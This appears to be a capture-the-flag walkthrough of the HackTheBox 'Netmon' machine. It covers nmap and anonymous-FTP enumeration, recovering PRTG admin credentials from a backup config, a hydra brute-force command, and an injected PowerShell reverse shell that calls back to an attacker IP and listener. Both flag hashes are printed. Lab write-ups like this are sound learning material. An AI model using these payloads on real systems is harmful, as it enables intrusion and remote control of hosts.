Netmon

Easy box from HTB, quite frankly user flag could have been hidden a bit more. Enumerating the server to obtain the bak files was quite a challenge. RCE at the end was basic

Learning:

  • Enumeration on FTP

  • Credential Hunt

  • Executing RCE manually or using msfconsole

Enumeration

nmap 10.129.230.176        
Starting Nmap 7.95 ( <https://nmap.org> ) at 2025-01-25 13:06 AEDT
Nmap scan report for 10.129.230.176
Host is up (0.029s latency).
Not shown: 994 closed tcp ports (reset)
PORT     STATE SERVICE
21/tcp   open  ftp
80/tcp   open  http
135/tcp  open  msrpc
139/tcp  open  netbios-ssn
445/tcp  open  microsoft-ds
5985/tcp open  wsman

Nmap done: 1 IP address (1 host up) scanned in 0.69 seconds

Check ftp

└─$ nmap 10.129.230.176 -p 21 -A
Starting Nmap 7.95 ( <https://nmap.org> ) at 2025-01-25 13:08 AEDT
Nmap scan report for 10.129.230.176
Host is up (0.021s latency).

PORT   STATE SERVICE VERSION
21/tcp open  ftp     Microsoft ftpd
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
| 02-02-19  11:18PM                 1024 .rnd
| 02-25-19  09:15PM       <DIR>          inetpub
| 07-16-16  08:18AM       <DIR>          PerfLogs
| 02-25-19  09:56PM       <DIR>          Program Files
| 02-02-19  11:28PM       <DIR>          Program Files (x86)
| 02-03-19  07:08AM       <DIR>          Users
|_11-10-23  09:20AM       <DIR>          Windows
| ftp-syst: 
|_  SYST: Windows_NT
image.png

User.txt lives can be found on Public user when you navigate through the FTP

cat user.txt
6cf59125ff605c57eb6dc38a3b9cfce5

Enumerating ftp to obtain user credentials:

  • Goal attempt to find old bak files

  • Find old config files

Users:

netmon\\administrator

Bruteforce Attempt - Did not work

hydra -l prtgadmin -P /usr/share/wordlists/rockyou.txt 10.129.230.176 http-post-form "/public/checklogin.htm:username=^USER^&password=^PASS^&loginurl=:Your login has failed"

Navigating on FTP again looking for credential:

cd "Program Files (x86)\\PRTG Network Monitor\\"
# Nothing note worth the time in that directory 

cd "Program Files (x86)\\Windows"
# In program files we are heading to Windows
02-25-19  09:54PM              1189697 PRTG Configuration.dat

note: user common UID 100
Old.bak Files
Obtained from
/ProgramData/Paessler/PRTG Network Monitor

Get PRTG Configuration.old.bak

User Credential Found:

User: prtgadmin
Pass: PrTg@dmin2019

RCE

Shell Attempt:
windows/http/prtg_authenticated_rce
Vulnerable to RCE attacks

Another way obtaining RCE

In the PRTG Admin Panel head to:

  • Setup

  • Account Settings

  • Notifications

  • Inside the Notification setting head to Execute Program

  • Execute Program setting

tes.txt;$client = New-Object System.Net.Sockets.TCPClient('10.10.14.33',1234);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2  = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()

  • In the parameter Key input the Rev-Shell

  • Make sure you select Demo exe notification - outfile.ps1in the Program File parameter

  • Save

  • Create netcat session `nc -lvnp 1234`

  • Ones uploaded Head to notifications

  • Click our created notification name pwn

    • On the far right hand side you will see a small box with a pen click that

    • Click the bell (if you hover on it it will say send notification)

    • RCE done!

  • Follow the block dots if lost

Popped it.

C:\\Users\\Administrator\\Desktop>type root.txt
type root.txt
9282597bae369ff9a75033e99ddc5bcd
PreviousPOP RestaurantNextTryHackMe

Last updated